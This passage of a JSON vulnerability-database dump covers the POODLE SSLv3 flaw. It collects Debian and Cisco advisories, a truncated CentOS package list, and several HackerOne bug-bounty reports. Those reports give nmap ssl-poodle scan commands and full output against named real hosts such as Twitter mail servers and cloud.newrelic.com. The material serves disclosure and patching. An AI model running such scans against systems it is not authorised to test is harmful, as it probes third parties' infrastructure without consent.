(2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a BEAST attack.\n\n * [CVE-2012-4929](<https://security-tracker.debian.org/tracker/CVE-2012-4929>)\n\nThe TLS protocol 1.2 and earlier, as used in Mozilla Firefox, Google Chrome, Qt, and other products, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which allows man-in-the-middle attackers to obtain plaintext HTTP headers by observing length differences during a series of guesses in which a string in an HTTP request potentially matches an unknown string in an HTTP header, aka a CRIME attack.\n\n * [CVE-2014-3566](<https://security-tracker.debian.org/tracker/CVE-2014-3566>)\n\nThe SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the POODLE issue.", "edition": 1, "reporter": "Debian", "published": "2016-01-24T00:00:00", "title": "pound -- LTS security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2011-3389", "CVE-2012-4929", "CVE-2009-3555"], "modified": "2016-01-24T00:00:00", "href": "http://www.debian.org/security/2016/dla-400", "id": "DLA-400", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-07-05T01:12:26", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "1.0.1e-2+deb7u13", "arch": "all", "packageFilename": "libssl1.0.0_1.0.1e-2+deb7u13_all.deb", "packageName": "libssl1.0.0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "1.0.1e-2+deb7u13", "arch": "all", "packageFilename": "libssl1.0.0-dbg_1.0.1e-2+deb7u13_all.deb", "packageName": "libssl1.0.0-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "1.0.1e-2+deb7u13", "arch": "all", "packageFilename": "libssl-dev_1.0.1e-2+deb7u13_all.deb", "packageName": "libssl-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "1.0.1e-2+deb7u13", "arch": "all", "packageFilename": "libssl-doc_1.0.1e-2+deb7u13_all.deb", "packageName": "libssl-doc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "1.0.1e-2+deb7u13", "arch": "all", "packageFilename": "openssl_1.0.1e-2+deb7u13_all.deb", "packageName": "openssl", "operator": "lt"}], "description": "Several vulnerabilities have been found in OpenSSL, the Secure Sockets Layer library and toolkit.\n\n * [CVE-2014-3513](<https://security-tracker.debian.org/tracker/CVE-2014-3513>)\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure Real-time Transport Protocol (SRTP) extension data. A remote attacker could send multiple specially crafted handshake messages to exhaust all available memory of an SSL/TLS or DTLS server.\n\n * [CVE-2014-3566 (\"POODLE\")](<https://security-tracker.debian.org/tracker/CVE-2014-3566>)\n\nA flaw was found in the way SSL 3.0 handled padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. This flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections. \n\nThis update adds support for Fallback SCSV to mitigate this issue.\n\n * [CVE-2014-3567](<https://security-tracker.debian.org/tracker/CVE-2014-3567>)\n\nA memory leak flaw was found in the way an OpenSSL handled failed session ticket integrity checks. A remote attacker could exhaust all available memory of an SSL/TLS or DTLS server by sending a large number of invalid session tickets to that server. \n\n * [CVE-2014-3568](<https://security-tracker.debian.org/tracker/CVE-2014-3568>)\n\nWhen OpenSSL is configured with \"no-ssl3\" as a build option, servers could accept and complete a SSL 3.0 handshake, and clients could be configured to send them.\n\nFor the stable distribution (wheezy), these problems have been fixed in version 1.0.1e-2+deb7u13.\n\nFor the unstable distribution (sid), these problems have been fixed in version 1.0.1j-1.\n\nWe recommend that you upgrade your openssl packages.", "edition": 3, "reporter": "Debian", "published": "2014-10-16T00:00:00", "title": "openssl -- security update", "type": "debian", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-10-16T00:00:00", "id": "DSA-3053", "href": "http://www.debian.org/security/dsa-3053", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-07-04T01:30:25", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "6", "packageVersion": "0.9.8o-4squeeze18", "arch": "all", "packageFilename": "openssl_0.9.8o-4squeeze18_all.deb", "packageName": "openssl", "operator": "lt"}], "description": "Several vulnerabilities have been found in OpenSSL.\n\n * [CVE-2014-3566](<https://security-tracker.debian.org/tracker/CVE-2014-3566>)\n\n(\"POODLE\")\n\nA flaw was found in the way SSL 3.0 handled padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. This flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.\n\nThis update adds support for Fallback SCSV to mitigate this issue. This does not fix the issue. The proper way to fix this is to disable SSL 3.0.\n\n * [CVE-2014-3567](<https://security-tracker.debian.org/tracker/CVE-2014-3567>)\n\nA memory leak flaw was found in the way an OpenSSL handled failed session ticket integrity checks. A remote attacker could exhaust all available memory of an SSL/TLS or DTLS server by sending a large number of invalid session tickets to that server.\n\n * [CVE-2014-3568](<https://security-tracker.debian.org/tracker/CVE-2014-3568>)\n\nWhen OpenSSL is configured with \"no-ssl3\" as a build option, servers could accept and complete a SSL 3.0 handshake, and clients could be configured to send them.\n\nNote that the package is Debian is not build with this option.\n\n * [CVE-2014-3569](<https://security-tracker.debian.org/tracker/CVE-2014-3569>)\n\nWhen OpenSSL is build with the \"no-ssl3\" option and a SSL v3 Client Hello is received the ssl method would be set to NULL which could later result in a NULL pointer dereference.\n\nNote that the package is Debian is not build with this option.\n\nFor Debian 6 Squeeze, these issues have been fixed in openssl version 0.9.8o-4squeeze18", "edition": 1, "reporter": "Debian", "published": "2014-11-01T00:00:00", "title": "openssl -- LTS security update", "type": "debian", "enchantments": {"score": {"modified": "2018-07-04T01:30:25", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3567", "CVE-2014-3568", "CVE-2014-3569"], "modified": "2014-11-01T00:00:00", "id": "DLA-81", "href": "http://www.debian.org/security/2014/dla-81", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "hackerone": [{"lastseen": "2018-04-19T17:34:12", "references": [], "bounty": 280.0, "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/000/061/4acfe72859c5e9cb48a152edb4e498e13fa28df2_small.?1439954730", "medium": "https://profile-photos.hackerone-user-content.com/000/000/061/e78ef26a3191adcabe7311daa107bd9e152d3b5c_medium.?1439954730"}, "handle": "twitter", "url": "https://hackerone.com/twitter"}, "bountyState": "resolved", "description": "\n**Summary:** POODLE SSLv3 bug on multiple twitter smtp servers\n\n**Description:** CVE-2014-3566: The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the \"POODLE\" issue.\n\n\n## Steps To Reproduce:\n\nHi Twitter Sec team here is the POC\n\n 1. get a nmap installation and twitter_smtp_ssl_servers.txt file (attached) \n 2. run this command :\n\"nmap -sV --version-light -Pn --script ssl-poodle -p 25 -iL twitter_smtp_ssl_servers.txt | grep -B 5 VULNERABLE\"\n 3. See the results \n\n## Supporting Material/References:\n\n * An output screentshot and the twitter_smtp_ssl_servers.txt are attached.\n", "edition": 3, "reporter": "omespino", "published": "2017-11-09T21:44:16", "type": "hackerone", "title": "Twitter: POODLE SSLv3 bug on multiple twitter smtp servers (mx3.twitter.com,199.59.148.204,199.16.156.108 and 199.59.148.204)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "h1reporter": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/169/175/b95c1cd6fb801fdd32f67992784c2b4b497aa4d5_small.png?1521140844"}, "hacker_mediation": false, "disabled": false, "is_me?": false, "hackerone_triager": false, "url": "/omespino", "username": "omespino"}, "bulletinFamily": "bugbounty", "cvelist": ["CVE-2014-3566"], "modified": "2018-02-22T00:11:25", "href": "https://hackerone.com/reports/288966", "id": "H1:288966", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-24T03:22:19", "references": [], "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/017/011/4a259e2f731f105c784b1279db99215cefb8abbd_small.?1482361910", "medium": "https://profile-photos.hackerone-user-content.com/000/017/011/94822999c270d791d185b40e07d36cc864e96faa_medium.?1482361910"}, "handle": "newrelic", "url": "https://hackerone.com/newrelic"}, "bounty": 0.0, "bountyState": "resolved", "description": "Hi,\n\nI get in touch to report that cloud.newrelic.com is vulnerable to CVE-2014-3566 (POODLE). \n\nWebsites that support SSLv3 and CBC-mode ciphers are potentially vulnerable to an active MITM (Man-in-the-middle) attack. This attack, called POODLE, is similar to the BEAST attack and also allows a network attacker to extract the plaintext of targeted parts of an SSL connection, usually cookie data. Unlike the BEAST attack, it doesn't require such extensive control of the format of the plaintext and thus is more practical.\n\nThe impact of this vulnerability\n\tAn attacker may be able to exploit this problem to conduct man-in-the-middle attacks and decrypt communications between the affected service and clients.\n\nPoC:\n$ nmap -sV --version-light --script ssl-poodle -p 443 cloud.newrelic.com\nPORT STATE SERVICE REASON\n443/tcp open https syn-ack\n| ssl-poodle:\n| VULNERABLE:\n| SSL POODLE information leak\n\n$ nmap --script ssl-enum-ciphers -p 443 cloud.newrelic.com\n\nPORT STATE SERVICE\n443/tcp open https\n| ssl-enum-ciphers:\n| SSLv3:\n| ciphers:\n| TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A\n| TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A\n| TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C\n| compressors:\n| NULL\n| cipher preference: server\n| warnings:\n| 64-bit block cipher 3DES vulnerable to SWEET32 attack\n| CBC-mode cipher in SSLv3 (CVE-2014-3566)\n\nHow to fix this vulnerability\n\tIt's recommended to disable SSLv3 and replace it with TLSv1.0 as soon as compatibility with legacy clients is no longer required. (The only browser that does not support TLSv1.0 is Internet Explorer 6).\n\nTo disable SSLv2 and SSLv3: \n\tFor Nginx:\n\tssl_protocols TLSv1 TLSv1.1 TLSv1.2;\n\nReferences\n\thttps://security.googleblog.com/2014/10/this-poodle-bites-exploiting-ssl-30.html\n\nI look forward to hearing from you\n\nBest Regards", "edition": 3, "reporter": "guifre", "published": "2017-03-26T19:08:23", "title": "New Relic: SSL Padding Oracle On Downgraded Legacy Encryption (POODLE) Vulnerability", "type": "hackerone", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "h1reporter": {"profile_picture_urls": {"small": "/assets/avatars/default-71a302d706457f3d3a31eb30fa3e73e6cf0b1d677b8fa218eaeaffd67ae97918.png"}, "hacker_mediation": false, "disabled": false, "is_me?": false, "url": "/guifre", "hackerone_triager": false, "username": "guifre"}, "bulletinFamily": "bugbounty", "cvelist": ["CVE-2014-3566"], "modified": "2017-11-10T22:24:05", "href": "https://hackerone.com/reports/216271", "id": "H1:216271", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-19T17:34:09", "references": [], "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/015/966/de40911e781a8b85c3b253fa22f0119175ca91f2_small.png?1477497046", "medium": "https://profile-photos.hackerone-user-content.com/000/015/966/9b01ecc388e5d9d64b3b532dd5db41b02323e9dc_medium.png?1477497046"}, "handle": "semrush", "url": "https://hackerone.com/semrush"}, "bounty": 0.0, "bountyState": "not-applicable", "description": "**Summary:** \nPOODLE SSLv3 bug on multiple servers\n\n**Description:** \n CVE-2014-3566: The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the \"POODLE\" issue.\n\n## Steps To Reproduce:\n\n1. Create .txt file include this ip : ( 54.230.149.17 & 54.230.149.158 ) ex: ip.txt\n2. nmap -sV --version-light -Pn --script ssl-poodle -p 443 -iL ip.txt\n\n## Supporting Material/References:\n\n```\nroot@jancok:~# nmap -sV --version-light -Pn --script ssl-poodle -p 443 -iL ip.txt\n\nStarting Nmap 7.25BETA1 ( https://nmap.org ) at 2018-02-22 23:40 EST\nNmap scan report for server-54-230-149-17.sin2.r.cloudfront.net (54.230.149.17)\nHost is up (0.029s latency).\nPORT STATE SERVICE VERSION\n443/tcp open ssl/https?\n| ssl-poodle: \n| VULNERABLE:\n| SSL POODLE information leak\n| State: LIKELY VULNERABLE\n| IDs: OSVDB:113251 CVE:CVE-2014-3566\n| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and\n| other products, uses nondeterministic CBC padding, which makes it easier\n| for man-in-the-middle attackers to obtain cleartext data via a\n| padding-oracle attack, aka the \"POODLE\" issue.\n| Disclosure date: 2014-10-14\n| Check results:\n| TLS_RSA_WITH_AES_128_CBC_SHA\n| TLS_FALLBACK_SCSV properly implemented\n| References:\n| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n| https://www.imperialviolet.org/2014/10/14/poodle.html\n| https://www.openssl.org/~bodo/ssl-poodle.pdf\n|_ http://osvdb.org/113251\n1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :\nSF-Port443-TCP:V=7.25BETA1%T=SSL%I=2%D=2/22%Time=5A8F9B45%P=x86_64-pc-linu\nSF:x-gnu%r(GetRequest,36B,\"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nServer:\\x\nSF:20CloudFront\\r\\nDate:\\x20Thu,\\x2022\\x20Feb\\x202018\\x2016:40:40\\x20GMT\\r\nSF:\\nContent-Type:\\x20text/html\\r\\nContent-Length:\\x20551\\r\\nConnection:\\x\nSF:20close\\r\\nX-Cache:\\x20Error\\x20from\\x20cloudfront\\r\\nVia:\\x201\\.1\\x209\nSF:f6b01a312a31ea74b95b305e8d62497\\.cloudfront\\.net\\x20\$CloudFront\$\\r\\nX\nSF:-Amz-Cf-Id:\\x20wTZjtVmAWgTRJcBZoY1eKmML1MIGDjqyL8HHIbcopGOT3RptvM0oAw==\nSF:\\r\\n\\r\\n<!DOCTYPE\\x20HTML\\x20PUBLIC\\x20\\\"-//W3C//DTD\\x20HTML\\x204\\.01\\x\nSF:20Transitional//EN\\\"\\x20\\\"http://www\\.w3\\.org/TR/html4/loose\\.dtd\\\">\\n<\nSF:HTML><HEAD><META\\x20HTTP-EQUIV=\\\"Content-Type\\\"\\x20CONTENT=\\\"text/html;\nSF:\\x20charset=iso-8859-1\\\">\\n<TITLE>ERROR:\\x20The\\x20request\\x20could\\x20\nSF:not\\x20be\\x20satisfied</TITLE>\\n</HEAD><BODY>\\n<H1>ERROR</H1>\\n<H2>The\\\nSF:x20request\\x20could\\x20not\\x20be\\x20satisfied\\.</H2>\\n<HR\\x20noshade\\x2\nSF:0size=\\\"1px\\\">\\nBad\\x20request\\.\\n<BR\\x20clear=\\\"all\\\">\\n<HR\\x20noshade\nSF:\\x20size=\\\"1px\\\">\\n<PRE>\\nGenerated\\x20by\\x20cloudfront\\x20\$CloudFront\nSF:\$\\nRequest\\x20ID:\\x20wTZjtVmAWgTRJcBZoY1eKmML1MIGDjqyL8HHIbcopGOT3Rptv\nSF:M0oAw==\\n</PRE>\\n<ADDRESS>\\n</ADDRESS>\\n</BODY></HTML>\")%r(HTTPOptions,\nSF:36B,\"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nServer:\\x20CloudFront\\r\\nDat\nSF:e:\\x20Thu,\\x2022\\x20Feb\\x202018\\x2016:40:40\\x20GMT\\r\\nContent-Type:\\x20\nSF:text/html\\r\\nContent-Length:\\x20551\\r\\nConnection:\\x20close\\r\\nX-Cache:\nSF:\\x20Error\\x20from\\x20cloudfront\\r\\nVia:\\x201\\.1\\x20c811a11df2d0d24d49e3\nSF:cdf48257de21\\.cloudfront\\.net\\x20\$CloudFront\$\\r\\nX-Amz-Cf-Id:\\x20dUUs\nSF:gtWLhorBbOSJMk6AESCL5MYIhEXtXdoSrTQ5pa0vKwxzKOa_0Q==\\r\\n\\r\\n<!DOCTYPE\\x\nSF:20HTML\\x20PUBLIC\\x20\\\"-//W3C//DTD\\x20HTML\\x204\\.01\\x20Transitional//EN\\\nSF:\"\\x20\\\"http://www\\.w3\\.org/TR/html4/loose\\.dtd\\\">\\n<HTML><HEAD><META\\x2\nSF:0HTTP-EQUIV=\\\"Content-Type\\\"\\x20CONTENT=\\\"text/html;\\x20charset=iso-885\nSF:9-1\\\">\\n<TITLE>ERROR:\\x20The\\x20request\\x20could\\x20not\\x20be\\x20satisf\nSF:ied</TITLE>\\n</HEAD><BODY>\\n<H1>ERROR</H1>\\n<H2>The\\x20request\\x20could\nSF:\\x20not\\x20be\\x20satisfied\\.</H2>\\n<HR\\x20noshade\\x20size=\\\"1px\\\">\\nBad\nSF:\\x20request\\.\\n<BR\\x20clear=\\\"all\\\">\\n<HR\\x20noshade\\x20size=\\\"1px\\\">\\n\nSF:<PRE>\\nGenerated\\x20by\\x20cloudfront\\x20\$CloudFront\$\\nRequest\\x20ID:\\\nSF:x20dUUsgtWLhorBbOSJMk6AESCL5MYIhEXtXdoSrTQ5pa0vKwxzKOa_0Q==\\n</PRE>\\n<A\nSF:DDRESS>\\n</ADDRESS>\\n</BODY></HTML>\");\n\nNmap scan report for server-54-230-149-158.sin2.r.cloudfront.net (54.230.149.158)\nHost is up (0.028s latency).\nPORT STATE SERVICE VERSION\n443/tcp open ssl/https?\n| ssl-poodle: \n| VULNERABLE:\n| SSL POODLE information leak\n| State: LIKELY VULNERABLE\n| IDs: OSVDB:113251 CVE:CVE-2014-3566\n| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and\n| other products, uses nondeterministic CBC padding, which makes it easier\n| for man-in-the-middle attackers to obtain cleartext data via a\n| padding-oracle attack, aka the \"POODLE\" issue.\n| Disclosure date: 2014-10-14\n| Check results:\n| TLS_RSA_WITH_AES_128_CBC_SHA\n| TLS_FALLBACK_SCSV properly implemented\n| References:\n| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n| https://www.imperialviolet.org/2014/10/14/poodle.html\n| https://www.openssl.org/~bodo/ssl-poodle.pdf\n|_ http://osvdb.org/113251\n1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :\nSF-Port443-TCP:V=7.25BETA1%T=SSL%I=2%D=2/22%Time=5A8F9B45%P=x86_64-pc-linu\nSF:x-gnu%r(GetRequest,36B,\"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nServer:\\x\nSF:20CloudFront\\r\\nDate:\\x20Thu,\\x2022\\x20Feb\\x202018\\x2016:40:40\\x20GMT\\r\nSF:\\nContent-Type:\\x20text/html\\r\\nContent-Length:\\x20551\\r\\nConnection:\\x\nSF:20close\\r\\nX-Cache:\\x20Error\\x20from\\x20cloudfront\\r\\nVia:\\x201\\.1\\x209\nSF:80b603eea89acb9f5bc806e2efdf82c\\.cloudfront\\.net\\x20\$CloudFront\$\\r\\nX\nSF:-Amz-Cf-Id:\\x200GA88OFJqyG4qDARfjyQ1jGVyWfzjEnIf0PKUOQI1r6-AuHswKbacw==\nSF:\\r\\n\\r\\n<!DOCTYPE\\x20HTML\\x20PUBLIC\\x20\\\"-//W3C//DTD\\x20HTML\\x204\\.01\\x\nSF:20Transitional//EN\\\"\\x20\\\"http://www\\.w3\\.org/TR/html4/loose\\.dtd\\\">\\n<\nSF:HTML><HEAD><META\\x20HTTP-EQUIV=\\\"Content-Type\\\"\\x20CONTENT=\\\"text/html;\nSF:\\x20charset=iso-8859-1\\\">\\n<TITLE>ERROR:\\x20The\\x20request\\x20could\\x20\nSF:not\\x20be\\x20satisfied</TITLE>\\n</HEAD><BODY>\\n<H1>ERROR</H1>\\n<H2>The\\\nSF:x20request\\x20could\\x20not\\x20be\\x20satisfied\\.</H2>\\n<HR\\x20noshade\\x2\nSF:0size=\\\"1px\\\">\\nBad\\x20request\\.\\n<BR\\x20clear=\\\"all\\\">\\n<HR\\x20noshade\nSF:\\x20size=\\\"1px\\\">\\n<PRE>\\nGenerated\\x20by\\x20cloudfront\\x20\$CloudFront\nSF:\$\\nRequest\\x20ID:\\x200GA88OFJqyG4qDARfjyQ1jGVyWfzjEnIf0PKUOQI1r6-AuHsw\nSF:Kbacw==\\n</PRE>\\n<ADDRESS>\\n</ADDRESS>\\n</BODY></HTML>\")%r(HTTPOptions,\nSF:36B,\"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nServer:\\x20CloudFront\\r\\nDat\nSF:e:\\x20Thu,\\x2022\\x20Feb\\x202018\\x2016:40:40\\x20GMT\\r\\nContent-Type:\\x20\nSF:text/html\\r\\nContent-Length:\\x20551\\r\\nConnection:\\x20close\\r\\nX-Cache:\nSF:\\x20Error\\x20from\\x20cloudfront\\r\\nVia:\\x201\\.1\\x20e14935429e8b5cfb258b\nSF:503fe0233feb\\.cloudfront\\.net\\x20\$CloudFront\$\\r\\nX-Amz-Cf-Id:\\x20s4YG\nSF:LwviLFSBvGk8WD5Z0N2LIqbeVPqlxi2Y6JXysX-6zPgTxSvnSg==\\r\\n\\r\\n<!DOCTYPE\\x\nSF:20HTML\\x20PUBLIC\\x20\\\"-//W3C//DTD\\x20HTML\\x204\\.01\\x20Transitional//EN\\\nSF:\"\\x20\\\"http://www\\.w3\\.org/TR/html4/loose\\.dtd\\\">\\n<HTML><HEAD><META\\x2\nSF:0HTTP-EQUIV=\\\"Content-Type\\\"\\x20CONTENT=\\\"text/html;\\x20charset=iso-885\nSF:9-1\\\">\\n<TITLE>ERROR:\\x20The\\x20request\\x20could\\x20not\\x20be\\x20satisf\nSF:ied</TITLE>\\n</HEAD><BODY>\\n<H1>ERROR</H1>\\n<H2>The\\x20request\\x20could\nSF:\\x20not\\x20be\\x20satisfied\\.</H2>\\n<HR\\x20noshade\\x20size=\\\"1px\\\">\\nBad\nSF:\\x20request\\.\\n<BR\\x20clear=\\\"all\\\">\\n<HR\\x20noshade\\x20size=\\\"1px\\\">\\n\nSF:<PRE>\\nGenerated\\x20by\\x20cloudfront\\x20\$CloudFront\$\\nRequest\\x20ID:\\\nSF:x20s4YGLwviLFSBvGk8WD5Z0N2LIqbeVPqlxi2Y6JXysX-6zPgTxSvnSg==\\n</PRE>\\n<A\nSF:DDRESS>\\n</ADDRESS>\\n</BODY></HTML>\");\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 2 IP addresses (2 hosts up) scanned in 27.51 seconds\n\n```\n\n## Impact\n\nits vulnerable CVE-2014-3566", "edition": 2, "reporter": "h3r0es", "published": "2018-02-22T16:43:36", "title": "SEMrush: SSLv3 Poodle Attack on Ip Of semrush", "type": "hackerone", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "h1reporter": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/147/580/38e2c92577fd689511b6272c709f3e2efccf43ad_small.jpg?1511661332"}, "hacker_mediation": false, "disabled": false, "is_me?": false, "url": "/h3r0es", "hackerone_triager": false, "username": "h3r0es"}, "bulletinFamily": "bugbounty", "cvelist": ["CVE-2014-3566"], "modified": "2018-03-13T14:31:05", "href": "https://hackerone.com/reports/318594", "id": "H1:318594", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisco": [{"lastseen": "2017-09-26T15:33:22", "_object_types": ["robots.models.cisco.CiscoBulletin", "robots.models.base.Bulletin"], "enchantments_done": [], "references": ["http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle"], "description": "A padding oracle vulnerability in the SSLv3 protocol could allow an unauthenticated, remote attacker to decrypt subsets of the encrypted communication.\n\nThe vulnerability is due to to the fact that the integrity of the Cipher Block Chaining (CBC) block cipher padding cannot be fully verified when decrypting. An attacker could exploit this vulnerability by performing an active Man in the Middle (MITM) attack.\n\nOn October 14, 2014, a vulnerability was publicly announced in the Secure Sockets Layer version 3 (SSLv3) protocol when using a block cipher in Cipher Block Chaining (CBC) mode. SSLv3 is a cryptographic protocol designed to provide communication security, which has been superseded by Transport Layer Security (TLS) protocols. By exploiting this vulnerability, an attacker could decrypt a subset of the encrypted communication.\n\nThis advisory is available at the following link:\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle [\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle\"]", "reporter": "Cisco", "published": "2014-10-15T18:30:00", "title": "SSL Padding Oracle On Downgraded Legacy Encryption (POODLE) Vulnerability", "type": "cisco", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-3566"], "_object_type": "robots.models.cisco.CiscoBulletin", "modified": "2017-04-12T13:43:52", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle", "id": "CISCO-SA-20141015-POODLE", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-09-26T15:33:49", "_object_types": ["robots.models.cisco.CiscoBulletin", "robots.models.base.Bulletin"], "references": ["http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20141211-CVE-2014-8730"], "enchantments_done": [], "description": "A vulnerability in certain implementations of the TLSv1 protocol could allow an unauthenticated, remote attacker to access sensitive information.\n\nThe vulnerability is due to improper block cipher padding implemented in TLSv1 when using Cipher Block Chaining (CBC) mode. An attacker could exploit the vulnerability to perform an \"oracle padding\" side channel attack on the cryptographic message. A successful exploit could allow the attacker to access sensitive information.\n\nConsult the bug release note for additional information about affected products and configurations.\n\nF5 Networks has confirmed the vulnerability in a security advisory and released software updates.\n\nAttacks exploiting this vulnerability are identified as Padding Oracle On Downgraded Legacy Encryption (POODLE) attacks, which could be used to disclose HTTP cookies or other HTTP authorization content that is being transmitted over an TLSv1.x secure session. This issue should not be confused with CVE-2014-3566, as described in Cisco Alert 36084[\"http://tools.cisco.com/security/center/viewAlert.x?alertId=36084\"].\n\nIt should be noted that oracle does not refer to the software company of the same name, but to a term used in cryptography.\n\nTo exploit the vulnerability, the attacker may require access to a trusted, internal network to perform man-in-the-middle attacks on a targeted system. This access requirement limits the likelihood of a successful exploit.", "reporter": "Cisco", "published": "2014-12-11T19:21:05", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "SSL-TLS Implementations Cipher Block Chaining Padding Information Disclosure Vulnerability", "type": "cisco", "affectedSoftware": [{"name": "IOS", "version": "12.4T", "operator": "eq"}, {"name": "IOS", "version": "15.2T", "operator": "eq"}, {"name": "IOS", "version": "15.4T", "operator": "eq"}, {"name": "IOS", "version": "15.4M", "operator": "eq"}, {"name": "Cisco Adaptive Security Appliance (ASA) Software", "version": "any", "operator": "eq"}, {"name": "Cisco ASR 5000 Series Software", "version": "any", "operator": "eq"}], "bulletinFamily": "software", "cvelist": ["CVE-2014-3566", "CVE-2014-8730"], "_object_type": "robots.models.cisco.CiscoBulletin", "modified": "2015-09-30T14:00:09", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20141211-CVE-2014-8730", "id": "CISCO-SA-20141211-CVE-2014-8730", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "centos": [{"lastseen": "2017-10-03T18:24:50", "references": ["https://rhn.redhat.com/errata/RHSA-2014-1948.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss-sysinit", "packageFilename": "nss-sysinit-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss", "packageFilename": "nss-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss", "packageFilename": "nss-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-softokn-freebl-devel", "packageFilename": "nss-softokn-freebl-devel-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-3.el6_6.i686.rpm", "operator": 